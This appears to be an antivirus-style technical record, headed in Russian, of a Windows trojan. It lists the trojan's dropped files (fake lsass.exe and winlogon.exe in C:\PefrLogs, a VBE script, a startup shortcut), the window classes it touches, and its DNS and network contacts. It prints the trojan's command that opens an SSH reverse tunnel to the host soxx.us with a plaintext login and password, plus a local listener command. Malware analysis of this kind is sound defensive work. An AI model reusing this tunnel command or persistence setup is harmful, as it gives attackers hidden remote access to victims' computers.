Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
- 'C:\PefrLogs\lsass.exe' -ssh -R 40676:127.0.0.1:7908 soxx.us -l fanel -pw 906090lol
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p7908 -a
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- C:\PefrLogs\2064244728_2024558888_0035759724.wma
- C:\PefrLogs\GoogleIndexer.vbe
- <LS_APPDATA>\PUTTY.RND
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\winlogon.exe
- 'so#x.us':22
- DNS ASK so#x.us
- ClassName: 'WMPlayerApp' WindowName: '(null)'
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- ClassName: 'Type32_Main_Window' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''